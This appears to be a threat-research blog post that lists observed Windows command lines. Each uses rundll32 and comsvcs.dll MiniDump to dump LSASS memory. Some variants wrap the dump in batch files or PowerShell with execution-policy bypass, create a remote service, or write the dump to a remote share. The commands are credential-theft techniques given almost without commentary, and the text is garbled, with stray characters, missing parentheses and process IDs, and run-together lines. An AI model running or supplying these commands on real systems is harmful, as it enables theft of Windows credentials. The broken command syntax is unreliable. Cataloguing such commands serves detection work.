\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Administrator\.dmp full ^> \\127.0.0.1\C$\_output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.batĬ:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format dd-MM-hh-mm-ssdmp full"Ĭ:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoP -C C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump Get-Process lsass).Id \Windows\Temp\.dmp full Wait-Process -Id (Get-Process rundll32).idĬmd /C "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \\ipv4\pwn\.dmp full"Ĭmd.exe /Q /c for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp fullĬmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp fullĬmd.exe /C cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp fullĬmd.exe /C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump Get-Process lsass).Id \Windows\Temp\.dmp full Wait-Process -Id (Get-Process rundll32).id"Ĭmd.exe /Q /c powershell -noni -nop "rundll32.exe comsvcs.dll,minidump c:\windows\temp\test.log full" 1> \\127.0.0.1\ADMIN$\_1111111.1111111 2>&1Ĭmd.exe /Q /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\.dmp full 1> \\127.0.0.1\ADMIN$\_1111111.1111111 2>&1 "Powershell" -c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump get-process lsass).id C:\Users\username\AppData\Local\Temp\.dmp full"Ĭ:\Windows\system32\cmd.exe /c "echo string >NUL & powershell -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump a C:\Windows\TEMP\string\string\.dmp full" & exit"Ĭ:\Windows\system32\cmd.exe /Q /c echo. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump C:\Users\username\Desktop\.DMP full "C:\Windows\system32\sc.exe" \\server create Dump binpath= "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump C:\dump.bin full" \rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Administrator\.dmp full
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump \Windows\Temp\.dmp full
By by Jenna Magius and Nate Caroe - Calling MiniDump export by ordinal examples: (comsvcs,#24)
0 kommentar(er)
